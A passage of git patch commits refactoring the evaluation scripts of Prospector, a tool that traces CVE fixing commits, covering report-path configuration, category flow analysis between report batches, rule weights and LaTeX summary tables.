new_category = results2.get(cve, None) @@ -440,7 +451,20 @@ def analyse_category_flows(): def _create_cve_to_category_mapping(results: dict) -> dict: res = {} - for category in results.keys(): + categories = [ + "high", + # "COMMIT_IN_REFERENCE", + # "VULN_ID_IN_MESSAGE", + # "VULN_ID_IN_LINKED_ISSUE", + # "XREF_BUG", + "medium", + "low", + "not_found", + "not_reported", + "false_positive", + ] + + for category in categories: for cve in results[category]: res[cve] = category @@ -494,8 +518,24 @@ def analyse_category_flows_no_mutual_exclusion(): transitions[category]["data1"] = d1 transitions[category]["data2"] = d2 + # Append to the existing flow analysis results + printout = { + "timestamp": datetime.now().strftime("%d-%m-%Y, %H:%M"), + "results": transitions, + } + + try: + with open( + f"{ANALYSIS_RESULTS_PATH}summary_execution/flow-analysis.json", "r" + ) as f: + existing_data = json.load(f) + except (FileNotFoundError, json.JSONDecodeError): + existing_data = {"flow_analysis_details": []} + + existing_data["flow_analysis_details"].append(printout) + save_dict_to_json( - transitions, + existing_data, f"{ANALYSIS_RESULTS_PATH}summary_execution/flow-analysis.json", ) diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index 3b49a1b18..3a3943e0d 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -116,8 +116,8 @@ def main(argv): candidates_execution_time(args.input) elif args.flow: - # analyse_category_flows() - analyse_category_flows_no_mutual_exclusion() + analyse_category_flows() + # analyse_category_flows_no_mutual_exclusion() # analysis of Prospector reports else: analyse_prospector_reports(args.input, args.cve) From e2deaba015e559beeb0b1f04b28884c309671f69 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 12:54:18 +0000 Subject: [PATCH 107/130] [FIX] gives host permission to read and write to log files --- prospector/docker/Dockerfile | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/prospector/docker/Dockerfile b/prospector/docker/Dockerfile index c65ad74a1..38d8a1b3b 100644 --- a/prospector/docker/Dockerfile +++ b/prospector/docker/Dockerfile @@ -3,6 +3,13 @@ FROM python:3.10-slim RUN mkdir -p /app COPY ./requirements.txt /app/ WORKDIR /app +# Create log files with permissions for host user +RUN touch evaluation.log +RUN touch prospector.log +RUN chown ${UID}:${GID} evaluation.log +RUN chown ${UID}:${GID} prospector.log + +# Install dependencies with pip RUN pip install --upgrade pip RUN apt update && apt install -y --no-install-recommends gcc g++ libffi-dev python3-dev libpq-dev git curl RUN pip install --no-cache-dir -r requirements.txt From 7d16871db74359fcde47ce36dd83a98d2b8c21c0 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 16 Aug 2024 11:43:27 +0000 Subject: [PATCH 108/130] [FIX] new method to generate better flow analysis --- prospector/evaluation/analyse.py | 182 ++++++++++++++----------------- 1 file changed, 80 insertions(+), 102 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 84229e39f..d7bc85ab7 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -364,8 +364,9 @@ def _save_summary_execution_details( printout = { "timestamp": datetime.now().strftime("%d-%m-%Y, %H:%M"), "results": results, - "missing": reports_not_found, + # "missing": reports_not_found, } + printout["results"]["missing"] = reports_not_found try: with open(detailed_results_output_path, "r") as f: existing_data = json.load(f) @@ -416,79 +417,29 @@ def analyse_category_flows(): data2 = load_json_file(COMPARE_DIRECTORY_2) print(f"Comparing {COMPARE_DIRECTORY_1} with {COMPARE_DIRECTORY_2}") - transitions = defaultdict(lambda: defaultdict(list)) + # Get the results from both files + results1 = data1["summary_execution_details"][0]["results"] + results2 = data2["summary_execution_details"][0]["results"] - results1 = _create_cve_to_category_mapping( - data1["summary_execution_details"][-1]["results"] - ) - # Add missing reports to results dict - for cve in data1["summary_execution_details"][-1]["missing"]: - results1[cve] = "missing" - results2 = _create_cve_to_category_mapping( - data2["summary_execution_details"][-1]["results"] - ) - for cve in data2["summary_execution_details"][-1]["missing"]: - results2[cve] = "missing" - - for cve, category in results1.items(): - new_category = results2.get(cve, None) - if not new_category: - print(f"No report for {cve} in second batch.") - continue + transitions, adjustments = _process_cve_transitions(results1, results2) - if results2.get(cve, "") != category: - transitions[category][new_category].append(cve) + # Create the final output structure + output_data = { + "transitions": [{k: v} for k, v in transitions.items()], + "category_adjustments": {k: v for k, v in adjustments.items()}, + } save_dict_to_json( - transitions, + output_data, f"{ANALYSIS_RESULTS_PATH}summary_execution/flow-analysis.json", ) - # Create a sankey diagram - # source = transitions.keys() - # _create_sankey_diagram(source, target, value) - -def _create_cve_to_category_mapping(results: dict) -> dict: - res = {} +def _process_cve_transitions(results1, results2): + transitions = defaultdict(list) + adjustments = defaultdict(int) categories = [ "high", - # "COMMIT_IN_REFERENCE", - # "VULN_ID_IN_MESSAGE", - # "VULN_ID_IN_LINKED_ISSUE", - # "XREF_BUG", - "medium", - "low", - "not_found", - "not_reported", - "false_positive", - ] - - for category in categories: - for cve in results[category]: - res[cve] = category - - return res - - -def analyse_category_flows_no_mutual_exclusion(): - """Analyse which CVEs changed category in different executions given two - JSON files with the detailed summary execution results. - - The detailed summary execution results are created when executing - `analyse_prospector_reports`. Uses the last entry in these files. - - Saves the output to `summary_execution/flow-analysis.json`. - """ - data1 = load_json_file(COMPARE_DIRECTORY_1)["summary_execution_details"][-1] - data2 = load_json_file(COMPARE_DIRECTORY_2)["summary_execution_details"][-1] - - # Skip the `high` category - categories = [ - "COMMIT_IN_REFERENCE", - "VULN_ID_IN_MESSAGE", - "VULN_ID_IN_LINKED_ISSUE", - "XREF_BUG", "medium", "low", "not_found", @@ -497,47 +448,69 @@ def analyse_category_flows_no_mutual_exclusion(): "missing", ] - # Create the dictionary structure - transitions = {} - - for category in categories: - transitions[category] = {"data1": [], "data2": []} - - # Whichever ones do not have a report in both sets (Matteo and me), do not consider them and just list them as missing. - transitions["missing"]["data1"] = data1["missing"] - transitions["missing"]["data2"] = data2["missing"] - - missing = data1["missing"] + data2["missing"] - - categories.remove("missing") - # For each category, get which ones are in first, but not in second and in second but not in first - for category in categories: - d1, d2 = _get_symmetric_difference( - data1["results"][category], data2["results"][category], missing + for cat1 in categories: + for cat2 in categories: + if cat1 == cat2: + continue + + cves_moving = set(results1[cat1]) & set(results2[cat2]) + for cve in cves_moving: + if cat1 != "missing" and cat2 != "missing": + report1 = load_json_file( + f"../../../data/prospector_reports/reports_now_with_matteos_code/{cve}.json" + ) + report2 = load_json_file( + f"../../../data/prospector_reports/reports_without_llm_mvi/{cve}.json" + ) + + different_refs = _compare_references( + report1["advisory_record"]["references"], + report2["advisory_record"]["references"], + ) + + cve_info = {"different references": different_refs} + + # If references are the same, check commits + if not different_refs: + commits1 = [ + commit["commit_id"] for commit in report1["commits"] + ] + commits2 = [ + commit["commit_id"] for commit in report2["commits"] + ] + same_commits_diff_order = _compare_commits( + commits1, commits2 + ) + cve_info["same commits, ordered differently"] = ( + same_commits_diff_order + ) + + if not same_commits_diff_order: + relevance_sum1 = _sum_relevance(report1["commits"]) + relevance_sum2 = _sum_relevance(report2["commits"]) + cve_info["same relevance sum"] = ( + relevance_sum1 == relevance_sum2 + ) + + transitions[f"{cat1} to {cat2}"].append({cve: cve_info}) + adjustments[cat1] -= 1 + adjustments[cat2] += 1 + + return transitions, adjustments + + +def _sum_relevance(commits): + # Calculate the sum of relevance for rules in the first 10 commits + relevance_sum = 0 + for commit in commits[:10]: + relevance_sum += sum( + rule["relevance"] for rule in commit["matched_rules"] ) - transitions[category]["data1"] = d1 - transitions[category]["data2"] = d2 + return relevance_sum - # Append to the existing flow analysis results - printout = { - "timestamp": datetime.now().strftime("%d-%m-%Y, %H:%M"), - "results": transitions, - } - try: - with open( - f"{ANALYSIS_RESULTS_PATH}summary_execution/flow-analysis.json", "r" - ) as f: - existing_data = json.load(f) - except (FileNotFoundError, json.JSONDecodeError): - existing_data = {"flow_analysis_details": []} - - existing_data["flow_analysis_details"].append(printout) - - save_dict_to_json( - existing_data, - f"{ANALYSIS_RESULTS_PATH}summary_execution/flow-analysis.json", - ) +def _compare_references(refs1, refs2): + return refs1 != refs2 def _get_symmetric_difference(list1: list, list2: list, ignore: list): @@ -549,6 +522,11 @@ def _get_symmetric_difference(list1: list, list2: list, ignore: list): ) +def _compare_commits(commits1, commits2): + # Check if the two lists of commits contain the same elements, but possibly in different order + return sorted(commits1) == sorted(commits2) and commits1 != commits2 + + def difference_ground_truth_datasets(): """To find out if two ground truth datasets contain the same CVEs.""" filepath1 = "evaluation/data/input/d63.csv" From 7775f65b877ab4815f93eebb3d907c96d189e638 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 16 Aug 2024 11:44:31 +0000 Subject: [PATCH 109/130] [FIX] changes weight of commit classification rule to 16 instead of 32 (shows better results) --- prospector/evaluation/main.py | 1 - prospector/rules/rules.py | 2 +- 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index 3a3943e0d..62daca433 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -6,7 +6,6 @@ from evaluation.analyse import ( analyse_category_flows, - analyse_category_flows_no_mutual_exclusion, analyse_prospector_reports, count_existing_reports, difference_ground_truth_datasets, diff --git a/prospector/rules/rules.py b/prospector/rules/rules.py index c9d0993de..0793b47ee 100644 --- a/prospector/rules/rules.py +++ b/prospector/rules/rules.py @@ -498,5 +498,5 @@ def apply( ] RULES_PHASE_2: List[Rule] = [ - CommitIsSecurityRelevant("COMMIT_IS_SECURITY_RELEVANT", 32) + CommitIsSecurityRelevant("COMMIT_IS_SECURITY_RELEVANT", 16) ] From 158c0bbbd47039c26e7d3246220e4f62b7d2b059 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 19 Aug 2024 09:22:52 +0000 Subject: [PATCH 110/130] [IMP] refactors the code so that the batch of reports can be chosen in the config file --- prospector/evaluation/analyse.py | 220 +++++++------------- prospector/evaluation/analyse_statistics.py | 6 +- prospector/evaluation/compare_reports.py | 2 +- prospector/evaluation/dispatch_jobs.py | 8 +- prospector/evaluation/extract_errors.py | 6 +- prospector/evaluation/utils.py | 120 +++++++---- 6 files changed, 167 insertions(+), 195 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index d7bc85ab7..d0adde520 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -7,95 +7,41 @@ from tqdm import tqdm from evaluation.utils import ( - COMPARE_DIRECTORY_1, - COMPARE_DIRECTORY_2, + COMPARISON_DIRECTORY, load_dataset, load_json_file, save_dict_to_json, update_summary_execution_table, logger, INPUT_DATA_PATH, - PROSPECTOR_REPORT_PATH, + PROSPECTOR_REPORTS_PATH_HOST, ANALYSIS_RESULTS_PATH, ) # The number of top commits to consider for 'high confidence' classification NUM_TOP_COMMITS = 10 -cc_rule_as_strong_rule = False -# Whether to use the old rule names (old: COMMIT_IN_REFERENCE, -# CVE_ID_IN_MESSAGE, CVE_ID_IN_LINKED_ISSUE, CROSS_REFERENCED_JIRA_LINK, -# CROSS_REFERENCED_GH_LINK) -use_old_rule_names = ( - True if "matteo_reports" in PROSPECTOR_REPORT_PATH else False -) - - -def _choose_strong_rules( - cc_rule_as_strong_rule: bool, use_old_rule_names: bool -) -> List[str]: - """Return the list of strong rules, given the settings.""" - if cc_rule_as_strong_rule and not use_old_rule_names: - STRONG_RULES = [ - "COMMIT_IN_REFERENCE", - "VULN_ID_IN_MESSAGE", - "XREF_BUG", - "XREF_GH", - "VULN_ID_IN_LINKED_ISSUE", - "COMMIT_IS_SECURITY_RELEVANT", - ] - elif use_old_rule_names and not cc_rule_as_strong_rule: - STRONG_RULES = [ - "COMMIT_IN_REFERENCE", - "CVE_ID_IN_MESSAGE", - "CROSS_REFERENCED_JIRA_LINK", - "CROSS_REFERENCED_GH_LINK", - "CVE_ID_IN_LINKED_ISSUE", - ] - else: - STRONG_RULES = [ - "COMMIT_IN_REFERENCE", - "VULN_ID_IN_MESSAGE", - "XREF_BUG", - "XREF_GH", - "VULN_ID_IN_LINKED_ISSUE", - ] - - return STRONG_RULES - - -STRONG_RULES = _choose_strong_rules(cc_rule_as_strong_rule, use_old_rule_names) - - -if not cc_rule_as_strong_rule and not use_old_rule_names: - WEAK_RULES = [ - "CHANGES_RELEVANT_FILES", - "COMMIT_IS_SECURITY_RELEVANT", - "CHANGES_RELEVANT_CODE", - "RELEVANT_WORDS_IN_MESSAGE", - "ADV_KEYWORDS_IN_FILES", - "ADV_KEYWORDS_IN_MSG", - "SEC_KEYWORDS_IN_MESSAGE", - "SEC_KEYWORDS_IN_LINKED_GH", - "SEC_KEYWORDS_IN_LINKED_BUG", - "GITHUB_ISSUE_IN_MESSAGE", - "BUG_IN_MESSAGE", - "COMMIT_HAS_TWINS", - ] -else: - WEAK_RULES = [ - "CHANGES_RELEVANT_FILES", - "CHANGES_RELEVANT_CODE", - "RELEVANT_WORDS_IN_MESSAGE", - "ADV_KEYWORDS_IN_FILES", - "ADV_KEYWORDS_IN_MSG", - "SEC_KEYWORDS_IN_MESSAGE", - "SEC_KEYWORDS_IN_LINKED_GH", - "SEC_KEYWORDS_IN_LINKED_BUG", - "GITHUB_ISSUE_IN_MESSAGE", - "BUG_IN_MESSAGE", - "COMMIT_HAS_TWINS", - ] +STRONG_RULES = [ + "COMMIT_IN_REFERENCE", + "VULN_ID_IN_MESSAGE", + "XREF_BUG", + "XREF_GH", + "VULN_ID_IN_LINKED_ISSUE", +] + +WEAK_RULES = [ + "CHANGES_RELEVANT_FILES", + "CHANGES_RELEVANT_CODE", + "RELEVANT_WORDS_IN_MESSAGE", + "ADV_KEYWORDS_IN_FILES", + "ADV_KEYWORDS_IN_MSG", + "SEC_KEYWORDS_IN_MESSAGE", + "SEC_KEYWORDS_IN_LINKED_GH", + "SEC_KEYWORDS_IN_LINKED_BUG", + "GITHUB_ISSUE_IN_MESSAGE", + "BUG_IN_MESSAGE", + "COMMIT_HAS_TWINS", +] def analyse_prospector_reports(filename: str, selected_cves: str): @@ -115,37 +61,23 @@ def analyse_prospector_reports(filename: str, selected_cves: str): reports_not_found = [] #### Data to insert into table - if use_old_rule_names: - results = { - "high": [], - "COMMIT_IN_REFERENCE": [], - "CVE_ID_IN_MESSAGE": [], - "CVE_ID_IN_LINKED_ISSUE": [], - "CROSS_REFERENCED_JIRA_LINK": [], - "CROSS_REFERENCED_GH_LINK": [], - "medium": [], - "low": [], - "not_found": [], - "not_reported": [], - "false_positive": [], - } - else: - results = { - "high": [], - "COMMIT_IN_REFERENCE": [], - "VULN_ID_IN_MESSAGE": [], - "VULN_ID_IN_LINKED_ISSUE": [], - "XREF_BUG": [], - "XREF_GH": [], - "COMMIT_IS_SECURITY_RELEVANT": [], - "medium": [], - "low": [], - "not_found": [], - "not_reported": [], - "false_positive": [], - } - - print(f"Analysing reports in {PROSPECTOR_REPORT_PATH}") + results = { + "high": [], + "COMMIT_IN_REFERENCE": [], + "VULN_ID_IN_MESSAGE": [], + "VULN_ID_IN_LINKED_ISSUE": [], + "XREF_BUG": [], + "XREF_GH": [], + "COMMIT_IS_SECURITY_RELEVANT": [], + "medium": [], + "low": [], + "not_found": [], + "not_reported": [], + "false_positive": [], + "aborted": [], + } + + print(f"Analysing reports in {PROSPECTOR_REPORTS_PATH_HOST}") logger.info(f"Attempting to analyse {len(dataset)} CVEs.") for record in tqdm(dataset, total=len(dataset), desc="Analysing Records"): @@ -156,7 +88,7 @@ def analyse_prospector_reports(filename: str, selected_cves: str): attempted_count += 1 try: - with open(f"{PROSPECTOR_REPORT_PATH}/{cve_id}.json") as file: + with open(f"{PROSPECTOR_REPORTS_PATH_HOST}/{cve_id}.json") as file: # Get all commit IDs present in the report report_data = json.load(file) @@ -177,43 +109,16 @@ def analyse_prospector_reports(filename: str, selected_cves: str): except Exception as e: logger.info(f"Error occured for {cve_id}: {e}") continue + # Append aborted reports to results object + results["aborted"] = reports_not_found - #### Table Data (write to table) - table_data = [] - - # Combine the two Cross Reference rules into one count - if use_old_rule_names: - results["CROSS_REFERENCED_JIRA_LINK"] += results[ - "CROSS_REFERENCED_GH_LINK" - ] - results.pop("CROSS_REFERENCED_GH_LINK") - # Remove the cc rule count before writing to the table as the table doesn't include it - else: - if cc_rule_as_strong_rule: - logger.info( - f"CC Rule matched for {len(results['COMMIT_IS_SECURITY_RELEVANT'])}: {results['COMMIT_IS_SECURITY_RELEVANT']}" - ) - results.pop("COMMIT_IS_SECURITY_RELEVANT") - - results["XREF_BUG"] += results["XREF_GH"] - results.pop("XREF_GH") - - logger.info(f"Ran analysis on {PROSPECTOR_REPORT_PATH}.") - - for key, v in results.items(): - if type(v) == list: - v = len(v) - logger.info(f"\t{v}\t{key}") - table_data.append([v, round(v / analysed_reports_count * 100, 2)]) - - # Generate the Latex table update_summary_execution_table( - mode="MVI", - data=table_data, - total=str(analysed_reports_count), + results=results, + total=analysed_reports_count, filepath=f"{ANALYSIS_RESULTS_PATH}summary_execution/table.tex", ) + logger.info(f"Ran analysis on {PROSPECTOR_REPORTS_PATH_HOST}.") logger.info( f"Analysed {analysed_reports_count}, couldn't find reports for {len(reports_not_found)} out of {attempted_count} analysis attempts." ) @@ -357,7 +262,9 @@ def _save_summary_execution_details( Returns: The filepath where the details were saved to. """ - batch_name = os.path.basename(os.path.normpath(PROSPECTOR_REPORT_PATH)) + batch_name = os.path.basename( + os.path.normpath(PROSPECTOR_REPORTS_PATH_HOST) + ) detailed_results_output_path = ( f"{ANALYSIS_RESULTS_PATH}summary_execution/{batch_name}.json" ) @@ -387,12 +294,12 @@ def count_existing_reports(data_filepath): missing_reports = [] generated_reports = [] - print(f"Counting reports in {PROSPECTOR_REPORT_PATH}") + print(f"Counting reports in {PROSPECTOR_REPORTS_PATH_HOST}") for record in dataset: cve_id = record[0] - if os.path.isfile(f"{PROSPECTOR_REPORT_PATH}/{cve_id}.json"): + if os.path.isfile(f"{PROSPECTOR_REPORTS_PATH_HOST}/{cve_id}.json"): generated_reports.append(cve_id) else: missing_reports.append(cve_id) @@ -413,9 +320,24 @@ def analyse_category_flows(): Saves the output to `summary_execution/flow-analysis.json`. """ - data1 = load_json_file(COMPARE_DIRECTORY_1) - data2 = load_json_file(COMPARE_DIRECTORY_2) - print(f"Comparing {COMPARE_DIRECTORY_1} with {COMPARE_DIRECTORY_2}") + summary_execution_file = ( + ANALYSIS_RESULTS_PATH + + "summary_execution/" + + PROSPECTOR_REPORTS_PATH_HOST.split("/")[-2] + + ".json" + ) + summary_execution_comparison_file = ( + ANALYSIS_RESULTS_PATH + + "summary_execution/" + + COMPARISON_DIRECTORY.split("/")[-2] + + ".json" + ) + + data1 = load_json_file(summary_execution_file) + data2 = load_json_file(summary_execution_comparison_file) + print( + f"Comparing {PROSPECTOR_REPORTS_PATH_HOST} with {COMPARISON_DIRECTORY}" + ) # Get the results from both files results1 = data1["summary_execution_details"][0]["results"] @@ -457,10 +379,10 @@ def _process_cve_transitions(results1, results2): for cve in cves_moving: if cat1 != "missing" and cat2 != "missing": report1 = load_json_file( - f"../../../data/prospector_reports/reports_now_with_matteos_code/{cve}.json" + f"{PROSPECTOR_REPORTS_PATH_HOST}/{cve}.json" ) report2 = load_json_file( - f"../../../data/prospector_reports/reports_without_llm_mvi/{cve}.json" + f"{COMPARISON_DIRECTORY}/{cve}.json" ) different_refs = _compare_references( diff --git a/prospector/evaluation/analyse_statistics.py b/prospector/evaluation/analyse_statistics.py index f3e3c8eed..4230b1bca 100644 --- a/prospector/evaluation/analyse_statistics.py +++ b/prospector/evaluation/analyse_statistics.py @@ -7,7 +7,7 @@ from evaluation.utils import ( ANALYSIS_RESULTS_PATH, INPUT_DATA_PATH, - PROSPECTOR_REPORT_PATH, + PROSPECTOR_REPORTS_PATH_HOST, load_dataset, load_json_file, ) @@ -36,7 +36,7 @@ def analyse_statistics(filename: str): # noqa: C901 # For each CSV in the input dataset, check its report for itm in dataset: # Each itm has ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS - filepath = PROSPECTOR_REPORT_PATH + filename + f"/{itm[0]}.json" + filepath = PROSPECTOR_REPORTS_PATH_HOST + filename + f"/{itm[0]}.json" try: repo_time, avg_cc_time, total_cc_time = _process_llm_statistics( filepath @@ -65,7 +65,7 @@ def analyse_statistics(filename: str): # noqa: C901 # How many commits was the commit classification rule applied to? for itm in dataset: - filepath = PROSPECTOR_REPORT_PATH + filename + f"/{itm[0]}.json" + filepath = PROSPECTOR_REPORTS_PATH_HOST + filename + f"/{itm[0]}.json" try: cc_num_commits = _get_cc_num_commits(filepath) break diff --git a/prospector/evaluation/compare_reports.py b/prospector/evaluation/compare_reports.py index f52afd39e..c27a0e196 100644 --- a/prospector/evaluation/compare_reports.py +++ b/prospector/evaluation/compare_reports.py @@ -18,7 +18,7 @@ def process_cve(cve, from_category, to_category): # Find Matteo's code report and my report try: matteo_report = load_json_file( - f"../../../data/prospector_reports/matteo_reports/{cve}.json" + f"../../../data/prospector_reports/reports_now_with_matteos_code/{cve}.json" ) my_report = load_json_file( f"../../../data/prospector_reports/reports_without_llm_mvi/{cve}.json" diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index f5c9e9662..f300c1be7 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -8,8 +8,8 @@ from core.report import generate_report from evaluation.utils import ( INPUT_DATA_PATH, - PROSPECTOR_REPORT_PATH, - PROSPECTOR_REPORT_PATH_CONTAINER, + PROSPECTOR_REPORTS_PATH_HOST, + PROSPECTOR_REPORTS_PATH_CONTAINER, load_dataset, logger, config, @@ -35,7 +35,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): dispatched_jobs = 0 for cve in dataset: # Skip already existing reports - if os.path.exists(f"{PROSPECTOR_REPORT_PATH}/{cve[0]}.json"): + if os.path.exists(f"{PROSPECTOR_REPORTS_PATH_HOST}/{cve[0]}.json"): continue dispatched_jobs += 1 @@ -50,7 +50,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): "cve_id": cve[0], "version_interval": cve[2], "report_type": "json", - "output_file": f"{PROSPECTOR_REPORT_PATH_CONTAINER}{cve[0]}.json", + "output_file": f"{PROSPECTOR_REPORTS_PATH_CONTAINER}{cve[0]}.json", "repository_url": cve[1], }, description="Prospector Job", diff --git a/prospector/evaluation/extract_errors.py b/prospector/evaluation/extract_errors.py index 269875208..545ab0e41 100644 --- a/prospector/evaluation/extract_errors.py +++ b/prospector/evaluation/extract_errors.py @@ -2,7 +2,7 @@ from evaluation.utils import ( INPUT_DATA_PATH, - PROSPECTOR_REPORT_PATH, + ANALYSIS_RESULTS_PATH, load_dataset, ) @@ -19,8 +19,8 @@ def extract_crash_lines(log_file_path, output_file_path): # Usage -log_file_path = f"{PROSPECTOR_REPORT_PATH}prospector.log" -output_file_path = f"{PROSPECTOR_REPORT_PATH}error_lines.log" +log_file_path = f"evaluation.log" +output_file_path = f"{ANALYSIS_RESULTS_PATH}error_lines.log" extract_crash_lines(log_file_path, output_file_path) print(f"Error lines have been extracted to {output_file_path}") diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index bc7f5a8e4..cb0996ed8 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -1,5 +1,6 @@ import csv import json +from typing import List from omegaconf import OmegaConf from log.logger import create_logger @@ -9,15 +10,6 @@ logger = create_logger("evaluation.log") logger.setLevel(config.debug_level) -INPUT_DATA_PATH = config.input_data_path -# Select the folder depending whether LLMs are used or not -PROSPECTOR_REPORT_PATH = config.prospector_reports_path -PROSPECTOR_REPORT_PATH_CONTAINER = config.prospector_reports_path_container -ANALYSIS_RESULTS_PATH = config.analysis_results_path -# Comparison dirs -COMPARE_DIRECTORY_1 = config.compare_directory1 -COMPARE_DIRECTORY_2 = config.compare_directory2 - def load_dataset(path: str): with open(path, "r") as file: @@ -43,57 +35,115 @@ def save_dict_to_json(dictionary: dict, path: str): def update_summary_execution_table( - mode: str, data, total: str, filepath: str + results: dict, total: str, filepath: str ) -> None: - """Updates the latex table at {ANALYSIS_RESULTS_PATH}/`file_path`. For this to work, the table latex code from D6.3 for tracer_dataset_results table must be saved in the file. + """Updates the LaTeX table at {ANALYSIS_RESULTS_PATH}/`filepath`. Params: - data (List(List(int, int))): The list of data, each item should be another list of two integers: the total and percentage. - data_total: The total amount of reports, to be inserted in the last row of the table. + results (dict): Dictionary with result counts. + total (str): The total amount of reports, to be inserted in the last row of the table. Saves: - The newly updated latex table at `file_path` - - Disclaimer: Partly generated with Claude Opus 3. + The newly updated LaTeX table at `filepath`. """ - # Read the existing LaTeX table from the file + # Combine the two Cross Reference rules into one count + results["XREF_BUG"] += results["XREF_GH"] + results.pop("XREF_GH") + + table_data = [] + for key, v in results.items(): + if type(v) == list: + v = len(v) + logger.info(f"\t{v}\t{key}") + table_data.append([v, round(v / total * 100, 2)]) + + # Choose which column to update: + if config.use_comparison_reports: + filepath = ANALYSIS_RESULTS_PATH + "summary_execution/mvi_table.tex" + col_indices = [1, 2] + + elif config.version_interval: + filepath = ANALYSIS_RESULTS_PATH + "summary_execution/mvi_table.tex" + col_indices = [3, 4] if not config.llm_support else [5, 6] + + else: + filepath = ANALYSIS_RESULTS_PATH + "summary_execution/nvi_table.tex" + col_indices = [1, 2] if not config.llm_support else [3, 4] + with open(filepath, "r") as file: table_lines = file.readlines() # Find the row numbers to edit; CHANGE if table changes! - lines_to_edit = [5, 8, 11, 14, 17, 18, 19, 20, 21, 22] + lines_to_edit = [5, 8, 11, 14, 17, 20, 21, 22, 23, 24, 25, 26] # Update the corresponding columns based on the mode - if mode == "MVI": - col_indices = [1, 2] - elif mode == "AVI": - col_indices = [3, 4] - elif mode == "NVI": - col_indices = [5, 6] - else: - raise ValueError( - "Invalid mode. Please choose from MVI, AVI, or NVI." - ) - try: for i, line_number in enumerate(lines_to_edit): - row_data = table_lines[line_number].split("&") + row_parts = table_lines[line_number].split("&") for j, col_index in enumerate(col_indices): - row_data[col_index] = str(data[i][j]) + row_parts[col_index] = f" {table_data[i][j]} " + + # Preserve everything after the last column we're updating + last_updated_col = max(col_indices) + end_part = " & ".join(row_parts[last_updated_col + 1 :]).strip() + + # Reconstruct the line, preserving formatting + updated_parts = row_parts[: last_updated_col + 1] + if end_part: + updated_parts.append(end_part) + table_lines[line_number] = " & ".join(updated_parts) + + # Ensure the line ends with \\ and a newline + if not table_lines[line_number].strip().endswith("\\\\"): + table_lines[line_number] = ( + table_lines[line_number] + " \\\\\n" + ) + elif not table_lines[line_number].endswith("\n"): + table_lines[line_number] += "\n" - table_lines[line_number] = " & ".join(row_data) except IndexError: raise IndexError( f"Invalid data structure at row {line_number}, column {j}" ) # Add the last row showing the total count - last_row_data = table_lines[23].split("&") - last_row_data[col_indices[0]] = f"\\textbf{total}" - table_lines[23] = " & ".join(last_row_data) + last_row = table_lines[27] + last_row_parts = last_row.split("&") + last_row_parts[col_indices[0]] = f" \\textbf{{{total}}} " + table_lines[27] = "&".join(last_row_parts) # Write the updated table back to the file with open(filepath, "w") as file: file.writelines(table_lines) print(f"Updated latex table at {filepath}") + + +def select_reports_path_host( + version_interval: bool, llm_support: bool, use_comparison_reports: bool +): + """Select where to store generated reports, or where to find reports for + analysis.""" + if use_comparison_reports: + return f"{config.reports_directory}old_code_reports/" + + if version_interval and not llm_support: + return f"{config.reports_directory}mvi_without_llm_reports/" + if version_interval and llm_support: + return f"{config.reports_directory}mvi_with_llm_reports/" + + if not version_interval and not llm_support: + return f"{config.reports_directory}nvi_without_llm_reports/" + if not version_interval and llm_support: + return f"{config.reports_directory}nvi_with_llm_reports/" + + +INPUT_DATA_PATH = config.input_data_path +# Select the folder depending whether LLMs are used or not +PROSPECTOR_REPORTS_PATH_HOST = select_reports_path_host( + config.version_interval, config.llm_support, config.use_comparison_reports +) +PROSPECTOR_REPORTS_PATH_CONTAINER = "/app/evaluation/data/reports/" +ANALYSIS_RESULTS_PATH = "evaluation/data/results/" +# Comparison dirs +COMPARISON_DIRECTORY = config.compare_directory From e03ef048c710313b557631fefcfa6c28782e69ab Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 19 Aug 2024 16:05:03 +0000 Subject: [PATCH 111/130] [ADD] adds comparison of keywords in reports to flow file --- prospector/evaluation/analyse.py | 60 +- prospector/evaluation/data/input/d63.csv | 1320 ---------------------- 2 files changed, 36 insertions(+), 1344 deletions(-) delete mode 100644 prospector/evaluation/data/input/d63.csv diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index d0adde520..368bf1c55 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -27,6 +27,7 @@ "XREF_BUG", "XREF_GH", "VULN_ID_IN_LINKED_ISSUE", + "COMMIT_IS_SECURITY_RELEVANT", ] WEAK_RULES = [ @@ -190,13 +191,6 @@ def _analyse_report( results[strong_matched_rule].append(cve_id) return - # # check for strong rules - # for rule in STRONG_RULES: - # mutually exclusive - # if rule in matched_rules: - # results[rule].append(cve_id) - # results["high"].append(cve_id) - # return if i <= 0 and candidates_in_fixing_commits: # check for weak rules @@ -367,7 +361,7 @@ def _process_cve_transitions(results1, results2): "not_found", "not_reported", "false_positive", - "missing", + # "missing", ] for cat1 in categories: @@ -394,26 +388,40 @@ def _process_cve_transitions(results1, results2): # If references are the same, check commits if not different_refs: - commits1 = [ - commit["commit_id"] for commit in report1["commits"] - ] - commits2 = [ - commit["commit_id"] for commit in report2["commits"] - ] - same_commits_diff_order = _compare_commits( - commits1, commits2 - ) - cve_info["same commits, ordered differently"] = ( - same_commits_diff_order + different_keywords = _compare_keywords( + report1["advisory_record"]["keywords"], + 